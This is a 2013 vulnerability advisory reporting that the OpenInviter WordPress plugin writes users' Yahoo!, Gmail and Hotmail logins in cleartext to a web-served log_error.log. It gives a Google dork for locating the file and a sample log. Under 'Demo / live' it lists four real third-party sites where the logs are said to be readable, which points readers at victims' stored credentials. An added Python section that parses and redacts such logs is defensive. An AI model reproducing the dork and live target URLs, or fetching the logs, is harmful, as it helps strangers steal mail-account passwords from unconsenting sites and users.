Login credentials for Yahoo!, Gmail, and more are left in cleartext in /tmp when provided to the WordPress OpenInviter plugin.
##########################################################
# Title : OpenInviter for WordPress Disclose User Information
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: Sat Jan 5/2013 (5.47 pm)
# Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/
# Type : Web Apps
# Tested on : Ubuntu / Windows XP
# Dork : inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log
##########################################################
---->
#--info about OpenInviter for WordPress:
>> Allow your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog.
Exploit:
Every user who logs in through this plugin gets a record written to the log_error file in the /tmp/ folder, and that record contains the user's email and password. Because the file is served from the web root, it discloses the user's credentials for their main mail account at Yahoo!, GMail, AOL, Hotmail and other providers.
Example
[Years-month-day TIME] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: hotmail
USER: victim@hotmail.com
PASSWORD: *********
STEPS:
initial_get :
URL: http://login.live.com/login.srf?id=2
METHOD: GET
RESPONSE: OK
login_post :
URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491
METHOD: POST
ELEMENTS:
PPSX=Passp
PwdPad=
type=
PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs
LoginOptions=3
login=victim@hotmail.com
passwd=***********
RESPONSE: OK
first_redirect :
URL: http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2
METHOD: GET
RESPONSE: FAILED
----------DETAILS END----------
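As an added defender-side example (not part of the advisory): a Python script that parses the log_error.log layout shown above, lists which accounts had a password written to it, redacts the secrets so the file can be kept for incident review, and locates such logs under a WordPress install. The sample log values and the plugin directory pattern are assumptions.

```python
import re
from pathlib import Path

# Constructed sample in the layout the advisory shows (values are made up).
SAMPLE_LOG = """[2013-01-05 17:47:00] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: hotmail
USER: victim@hotmail.com
PASSWORD: hunter2
STEPS:
login_post :
URL: https://login.live.com/ppsecure/post.srf?id=2
METHOD: POST
ELEMENTS:
login=victim@hotmail.com
passwd=hunter2
RESPONSE: OK
----------DETAILS END----------
"""

# One debug record per login attempt, delimited as in the advisory.
RECORD = re.compile(r"-+DETAILS START-+(?P<body>.*?)-+DETAILS END-+", re.S)
# Lines that carry the secret: the "PASSWORD:" header and the posted
# "passwd=" form field from the hotmail flow shown on the page.
SECRET_LINE = re.compile(r"^(?P<key>PASSWORD:[ \t]*|passwd=)(?P<val>.*)$", re.M)

def exposed_accounts(log_text):
    """Return (service, user) pairs whose password is written in the log."""
    found = []
    for rec in RECORD.finditer(log_text):
        body = rec.group("body")
        svc = re.search(r"^SERVICE:[ \t]*(\S+)", body, re.M)
        usr = re.search(r"^USER:[ \t]*(\S+)", body, re.M)
        if svc and usr and SECRET_LINE.search(body):
            found.append((svc.group(1), usr.group(1)))
    return found

def redact(log_text):
    """Blank every secret value while keeping the rest of the record intact."""
    return SECRET_LINE.sub(lambda m: m.group("key") + "[REDACTED]", log_text)

def find_logs(wp_root):
    """Locate OpenInviter debug logs under a WordPress install (assumed layout)."""
    pattern = "wp-content/plugins/**/OpenInviter/tmp/log_error.log"
    return sorted(Path(wp_root).glob(pattern))
```

Affected users should be told to change the mail-account password that was logged, and the log file should be removed or blocked from web access after redaction.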
#--Demo / live
http://brsinfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.123employee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://realestatemegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.learnpassion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
and many more can be found via Google :v....
#---->
Screenshot / Preview
http://i.imgur.com/tKILJ.png
<!----
#==================================================<Greet>==================================================#
# Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick #
# KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all #
# CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec #
# www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits #
#===========================================================================================================#